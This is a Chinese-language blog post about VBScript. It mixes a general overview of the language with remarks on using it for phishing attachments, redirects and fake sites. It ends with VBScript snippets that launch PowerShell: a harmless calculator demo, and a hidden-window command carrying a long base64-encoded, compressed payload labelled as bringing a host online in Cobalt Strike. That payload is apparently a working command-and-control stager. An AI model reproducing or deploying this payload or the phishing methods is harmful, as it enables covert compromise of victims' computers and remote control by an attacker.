VBScript
2024年7月11日大约 4 分钟
VBScript
概念
VBScript(Microsoft Visual Basic Scripting Edition)是微软以 Visual Basic 为蓝本开发的一种已废弃的动态脚本语言。它允许 Microsoft Windows 系统管理员生成用于管理计算机的强大工具,无需错误处理,并具有子程序和其他高级编程结构。它可以让用户完全控制计算环境的许多方面。
由于VBScript可以通过Windows脚本宿主调用COM,因而可以使用Windows操作系统中可以被使用的程序库,比如它可以使用Microsoft Office的库,尤其是使用Microsoft Access和Microsoft SQL Server的程序库,当然它也可以使用其它程序和操作系统本身的库。在实践中VBScript一般被用在以下三个方面:
Windows操作系统
VBScript可以被用来自动地完成重复性的Windows操作系统任务。在Windows操作系统中,VBScript可以在Windows Script Host的范围内运行。
Windows操作系统可以自动辨认和执行
.VBS和.WSF两种文件格式,此外Internet Explorer可以执行HTA和CHM文件格式。VBS和WSF文件完全是文字式的,它们只能通过少数几种对话窗口与用户通讯。HTA和CHM文件使用HTML格式,它们的程序码可以像HTML一样被编辑和检查。
在WSF、HTA和CHM文件中VBScript和JavaScript的程序码可以任意混合。
HTA文件实际上是加有VBS、JavaScript成分的HTML文件。CHM文件是一种在线帮助,用户可以使用专门的编辑程序将HTML程序编辑为CHM。
Windows 操作系统也提供一些 VBScript 脚本来进行高级管理功能,例如管理 Windows 激活密钥的 slmgr.vbs(Windows Server License Manager Script)。
从这里看来可以制作 VBS钓鱼附件 调用各种WIn操作, 比如调起命令行/PowerShell执行代码之类的, 或是其他组件下载以及执行恶意程序之类的
网页浏览器(客户端的VBS)
网页中的VBS可以用来控制客户端的网页浏览器(以浏览器执行VBS程序)。VBS与JavaScript在这一方面是竞争者,它们可以用来实现动态HTML,甚至可以将整个程序结合到网页中来。
至今为止VBS在客户方面未能占优势,因为它只获得Microsoft Internet Explorer的支持(Mozilla Suite可以透过安装一个包来支持VBS),并且IE11起已不再支持VBScript[1]。而JavaScript则受到所有网页浏览器的支持。在Internet Explorer中VBS和JavaScript使用同样的权限,它们只能有限地使用Windows操作系统中的对象。
从钓鱼的视角来看可以用来跳转到高仿钓鱼网站之类的
网页服务器(服务器方面的VBS)
在网页服务器方面VBS是微软的Active Server Pages的一部分,它与JavaServer Pages和PHP是竞争对手。在这里VBS的程序码直接嵌入到HTML页内,这样的网页以ASP结尾。网页服务器Internet信息服务执行ASP页内的程序部分并将其结果转化为HTML传递给网页浏览器供用户使用。这样服务器可以进行数据库闻讯并将其结果放到HTML网页中。
从钓鱼视角来看大概就是用于搭建伪造的钓鱼站点了吧, 不过从这个思路来看使用其他方式建站更方便(不过对于一些组织,机构,单位或许常用的站点比较老旧也可能会遇到需要使用到asp的地方)
VBS + Powershell
弹计算器
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run "powershell -c calc.exe", 0, true
上线 CobaltStrike:
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run "powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBhADIALwBpAHUAQgByACsAMwBQADYASwBmAEsAZwBFAEMATQBwAHkAcAArAHgAcQBwAEkAVwBFAFEAQQBpAEIAbABIAEEATAAzAGEAcAB5AEUAaABNAGMAbgBKAHYAagBBAEcASABQAC8AUABmAGoAQgBPAGgAMABkAGoAcgBuAGoASABSAE8AcABRAG8ANwBmAGkAKwBQAG4ALwBmAGkAVgA0AFAAMABVAGEATQBFAG0AVgBUAHgATABjAGcAOQBMAGkARwBKAGsATwA5AHgAdABmAHYANwBiAGUAeQBaAE4ARgAyAG4AaQB6AGMAYgAwAHIAZQBBACsATwBZAGIAcwBDAHcAQwBvADQAagA3ACsALwA1AE8AQgBRAFMANABYAFAANwBoAEEATQBpAGIANgAxAHMAeABoAGkAVQB1ADIANgBTAEMAMABJAG8ASgBMAE4AegBkADMAZAA5AGwAbgAyAEkAdgBBAGwAdgA0ADUAZwBHAEsARAB2AEQATgBoAFgAVABuAFcAeABIADMAaABjAHUALwBkAEkATgBBADgARgAyAEEAdgBOAGYAZgBmACsAZABqAFEAcQBCAEgATAAvAHYAeQBBAE4ASgB1AEYARQBIAFgAdwBBAGgARwArAFEATAAzAEwAMgA2ADEAZwB3AFEAKwBUAGcAMABIAG0AcABUADcAbQAzAHQANABLAHcAKwB3AGIAdwBCADgARgBVAHQANABZAE8ANwBZAEwAYgBxAGUAbABaADYATgBmAFIATwBrAE4AeQBoAHIAQQBVAFkAMABuAC8AdgByAHIAMQB6AGgANQBiAEgANgBXAHUANgBIAE0AYwBCAFIAUABxAGMAbABFAFkAVgB1ADIAYwBJADQAVgArAEMAKwBGAGwASwBIADgAeQBTAEEAKwBaAHkAQwBUAE8ASgBIAC8AcABhAFcAVgA4AGkAcgAxADgAcQBMAEQAUAAwAGsAQQA2ADkAYwBzAE8AYwBLADEANQB2AFoAQQBXAEQAMwArAFAAawBsAFUANgBzAFgAbgBYAHkATwBMAFYAWABHAFQAZgBmAEMAWQBhADcARQB2AGEAVAArAFgAbAA1AGYAdQBUAC8AZgAwAGMAeABpAGoAeQBJAFgAbABpAFcAUABRAHUASQBIAEcAaQBRAEgAWgBNAEsAbwBQAEEAUwBlAGgAZQBFAE0AYgBwAGwAYQBMAG0ASQB4ADgAKwB4AGMAZwBZAEUAZwBrAE0AYgBFADQAMgA1AFkAbQBOADcAQgAzADgAUAA4AGcAeABkAGoAWABHAEoAMgBYADMANwBWADcAbQB0ACsAQQBvADgAMwBjAG4AOQBWAEsAZgA5AFIAaQBVAG0AcABsAEIAUgBLADEANQB6ADQARgBUAHEAVQBMAEcAOAB1ADUAdABoADEAZgBrAEQALwBJAGIAawBLADcATwArAEgAQgBDAHYAYwBmAC8AMABzAFYAUwAyAEkAbwBRADAAbwBmAEsATwBNADMAdwArADUAZQBuADkAMwA5ADUASQB0AEkAYgB0AFAAWAB2AFUAagBsAE8AbAA5ADQAUwBvAGwAVABtAEUAZwBBAFAAVgBKAGsAbwBaAHoAVABtAEoAWQBlAFAAMABXAG4ANAB2AGIAbQAyAFoAVQArAHEAbQBoADYAawAzAHIAcQBuAE0ASgB6AHcAWABIAEYAKwA1AGwANgBTAFAAcgA5AGYANgB1AGMASAAvAE4AbgB2AFQANwBtAHgARQBqAGIARQBHAFMAbgB2ACsAOABHAGcAUwA0AFIAUgA0AFUARQBnACsANAB5AEwAdwBsAGYAUAA2AHoAbQBNAEUAdABoAGgAawBmADUAWgB2AFkAaABPAEgATQA1ADYANABIADAAQgBLAHUANwBPAFIAUwBRAGwAOQArAFYATwB1ADcAaQBMADcAcgA5AGkANwBnAHUAaQBhAEwAZQA4AFIAUQBzAFoAUQBvAGYAQQAvAG0ARQBzAE4AOABUAHYASQBVADYARABMACsATABuAHUAVwBwAGcAOQBiAFYAbQBiAHcASgBuADAAdAByAGUAVABtAFAAZAAyAG4AdQBjAHgAagBFAEUAVQBsAFQAbwAxAFoAbgBaAHMAbABUAG8ATQBBAFEANgB2AEUAZABiADAASQBYAFkAKwA2AE0AZgBXAHoAWgBlADQAYgBYAEMAWABHAEYASgBrAGcAbwBqAGQAegByADQAVgBQAEsATAAyADYANQBuADIAUABWAFUAeABzAHMAdQBnAHkARwB1AFoAYQBBAEUAMABFAGMATQBwAEsAaQBSAHMAaQBDAC8AWQBTAEQAZABrADMAQwBMAGwAUABPAGUARQBCAHgAcQB6AGsAbQBLAFUARABpAHcAbgA3AGsAbgBLAGgAMABUAFIAbgBpAEYAWAA2AFoAMwA0AFUAeQBoAHEAawBrAGgAdABnADYARABMAHAAcgBBAHUASgBHAE4AaQBzADUAMQB3AHIASwBrAHMAMwBZAEUATQByADkAeAA5AGcAMwArAHIAawBVAGgAUQBwAFYAegBlAFMAUABvAEIAbQBDAGEAQgBoAG4ANQBhADQASgBTAEsAVQA5AGIAVgBjADYAWQBmAEUAKwA5AC8AZwBmAGQAOQBpAHYAbwBQAEoARQAzAGcATgBaAEQANAByAFIARwBuAEwARwB2AHEAbABDAHoAQgAyAEkAbgBSAG0AegBSAGkARwAzAEYATQBoAEwAYwBHAFgAWABrAEwAVABXAHMAcgBNAG0ATwBsAHoAOAArAFcAZAA2AEkAeABXAFEAcABtAFMAUwBIAHkAMwBCAHkATABZAGEAbQBoAFoAagA4AHYAbgA2AHIAWABZAFAAbgBYAFUAYwBTAHQAUgBIAEsAawAyAFMAbgBSAHYAYwBqAEsAOQBKAGUAawBmAHgAQQBGAG8ANwBVADcAUAB0AGQAZwAzADUANQBTAEUAdwA3ADcAQQA5AGoATwB6AEYAawBWADQAZwBBAE4AagBOAHcANwBCAGEAZQB3ADQAcAB3ADYALwBUAHYAcABxAHQAegBaAEcATABkAFIARQBVAGoAegB1AG4AVAAwAFIAbQBTADcAVABlADUANwA2ACsAcQB4AEQAcABNAE4ARQA5AEgASABVAGwAbgBsAHgAdABRAEQASQBDAFQATgBmAHMAZAB1AG8AVwBuADIAUQBqAE0AOQBtAGEAMABlAG0ATgBlAGoAcgB4ADAAawBvAEgAZABTAHUAdABUAHEAWQBMAFYAZgAyAHgAUgBaAGwAdQBzAHUANABIAHcAZQBrAEgAMAA5AFYAUABSADYASABZADEAZABDAGoAZAAxAEIAVwBOAEwAUgBRAFIAbwA4AEQAZQBXAGEARABwADYAdwAwAFkAYQBaAHYAaABXAG0AdgB2AFQAUQBQAG8AQgAwAGYAKwA2AGsAZQB4AFQAeQBrAEsAUgArAGQATQBZACsAcgBGAGQAYgBjAEQAVgBxADYAMQA2AEEANABDAHEAMgB6ADgAYwBKAE0AcQAyAHoAQQBHAHMAagA5AGoAMwAyAEYAVABPAEkANgBwAE8AegB1AGQAMwB2AEgAUgBCAFUARgA5AHEAKwBLAHMAOABYAG0AegBYAGoAcABnAHAAQwBJAGgAbwB0AG8AdQBrAEIAUABpAHkANwBpADMAMQBkADMAWgBBAE0AMgAwAEYAawBHAEMAYwBwAFQAbQBUAFcAUgBtAGMAOQAyAEcAKwBzAFoAZABpAHYAcQA0AGEAMABHAEcASQBTAHgAaQBQAGsAMQB0AG0AZABrADYAdQBNAE8AMABvADAAcgBjAGQAKwA1AFkAMABsAGgAMAA5AE4ANgAxAHgATABoAGsARQBEAHQAQQBoAGkAbgBKADYAWQBuADMAYgBLAHIANwBtAEkASABHAGsAMQA5AGMAeQAxAGkARgB4AHoAVgB4AE4AbQBqAHQAbAB4ADQANwBEAEoAYwBEAGUARwBrADUARwA4AFAAcABHAFEAagBrAGgANAB3AEcARgB6AHEAcABvAHAANwBrAHcAdgBsAFgAOQB1ADQARwBtAFYAeQBZAGUARwBNADUAWgBCAFUAVQBLAEsAQQB6AHIAbgBhAEMAegBEAFEANwBwAE8AVgBFAEUAKwBKAFoASQBqAFAAYwBXADkAVgBFADgAWQBWAFAAZgB6AG8AZQArADAAOQAvADYAcQBYAHIAWABqAFgAagB0AGMANABKAEYAUwBoADkAMwBoAHgAbgBEAG0AVABiAHQAUwBIAFkAQgB3ADkAbgBTAEsAaAA2AHIAWAB0AHAAbwB6ADMAdQBVAEIALwB4AFMATQBuAGgAbwBMAHkANQBQAG8AMABmAFIAWgAwAGoAUwBNAHkAVgA0AHkAUwBIAHMAOQBWAFAAZgBGAHAANgAyAGwAagBGAHQARAA1AGEAQQAxADEATwBsAHEAegBpAHYAYgBBAGQANAAwAGsAMABsAHQAMABkAC8ATQBCAEgAZgBVAG4AKwAyAHIANgA4AEgAegBKAEoANgBMAFcASgA1AFgATwByAHoAUQAwAHkAZgA5AG8AegBKACsANwBwACsAbQBpADgAcABvAHIAZQAxAEYAZABiAGEAegBCAGMAUAByAGgAUgB0AGIAQQBjAEoATQAwAGIAdgAxAEcAWQB1AEgAcABTAHoARgByAG0AQwBzAFQAVQBGADgAcgBtAGkARAA3AHEAUwArAFcAQQBUAEQAMQBGADUAbQA0ADIAUQBMAGwAawB1AFAAUABHAG8ARQBVAHYATQA4AG4AYwBwAGQAQgBWAFAAbgBjAEcAcAB0AGkAMgA1AGIAQwBQAGMAZABzAGQAdABwAGkAbgBJAGkAegB6ADEAbAA1AHgAMwAzAGcAaAA1AFUANwBVADcAMQArAEYAdQB6ADIAVgBuAEkATQBSAEwAbAAyAG4AawBDADUARwBtAHQANQBVAC8AWAB6AFIANABZAEcAbQBOAEQAdAA3AFcAdwByADEAVgByADIANQA1ADEAQwBPADAANgBUADMAbgBrAHEAVQBNAEYAUgBpAEgAYwBQAFEAbQB1AGkAeAB2AGoAeQBxADYASwBsAHgAaABHAE0AbwA0ADIAUwBnAEQANABXAEoAVQBYADYAOABWAFMAMQBZAHUAMgByAHEANABGADkAVgB4AGMAeAB2AGEAKwBDAFUAQwA5AGQAVwBvADMAdAAxAHMATABHAGIAMwBCAHQATwBqADgATgBoAHAAaQBYAFAATgBCAGQAZgBuAGMAMgBEAFUAUQA3AGMAaAA3ADYAdgBUAEUAdABUAGMAOABkAFMATQBCAG8AdgBFAHoARwBHACsAbQBpAFcAdAA1AHgAcgBEAFYAawBPAGwAVQBNADMAcABUAC8AcQB6AHkAVwAzADQALwBuADQAcQBtAHEAeAA0ADcANQA0AEYAdQA2ADAARgA5ADAAcAArAEsAMQByAFEARABEAGYAMwBvAHIARQBCAFIAOABWADEAQgBWAGYAWgBJADIAOAArAGEAVABqAEQAUwA2AHQAcQA0AEUAVABZAHIARQBlADEAWQBaADYAKwBuAEsAMABDAHkAdABLAEcAbABpAHEAYgBEAGQATwBmAFkARgA2AHUAWABuAEEANAAzAEwARgBkAFoAagBjAHEARwBkAEUANQByAFYAUQBaADYAVgByAFAAeQBCAGoAYQBzADQANABtAGUAYQA2AEQAZABPADUAcQBEAE8ARAB5AHgALwB3AHIATAB5AGUASwBLAHkAUgA1AFQAbQBUAEMAcwBzAGIAeABXAGoARgBWADQAWgBIAGsATgBXAG8ATABYAGIAUgBuAE8AcwByAGsAVQBRADMANQBHAHAASgBoAG4AZABXADkAVQBZAEoAMgAyAFEAYQBLAHoAbQBsAEEAYwBzAHkAaQBNAEQANQBPADIAVwBlADkASgA4AC8ANgB4AG8AZwBrAHoAYQBkAEwAZgBkAFQAVgAyAGgAZwBKAGQAKwBaAEsAMQB5AGEAMQBQADIATwBSAHoAUwBxAGUASgBQAHoAagAyACsANABnAHAAOQA5ADcAcwBXAEkAdABqAHIAVABYADkAWABpAHgAbQA3AGYARAB1AC8AZQBqAGwANABmAFIANgBHAHkASABmADkANAAvAEcAaQBaAG0AcgBOACsALwB2AHYAdAA1AG0AaABRAFAANAAwAEQARgAvAE4AcABrAHAAZwBFAFEANwBnAEYAawBuAFoAZABQAFYANwBXADAAVQBmAFMASgBlAFoAeQBUAFYAUgA2AGwARwBQAHYALwA1AFcATAArAEgAeABJAE8AWQBqAGIAeABzAEsATAA2ADkASwBGADIATQBmAFQATwBkADYAbgA0AHkAWAB2ADMANQAzAHYAUABaAHkANwBsAGcAeQAzAHIAdAAwADEAWABoADIAKwBOAFEASwBOAHkAZQBQAFMAUABlAGIAcgBQAFIANQAzAHIARgAyAHcAVAA0ADcAUgBuAFoAcwBQAHUAVgBQAGgAQQA1AGgAcAA1AE4AZAB5AFcAdQBjAHEAcABYAEsAcABYADAAdAAxAEYAaAAxAG4ANgBkAEcATgA0AFAAawB2AHkANwB2AFYASQA2ACsAMwAyAEEAOAB0AEUAVgB6AGwAeQA5AEQAMgBzAGsAOQBsAHoANABmADQAegBCAGQAMQA3AC8ATwA3AHMAcABmADkAbgA4ACsASQAyADkARABOAEgAbgBsAEsAVQBQADgAcgA4AEIAVQBNAEMAcwB1AE4AOABOAEEAQQBBAD0AIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=", 0, true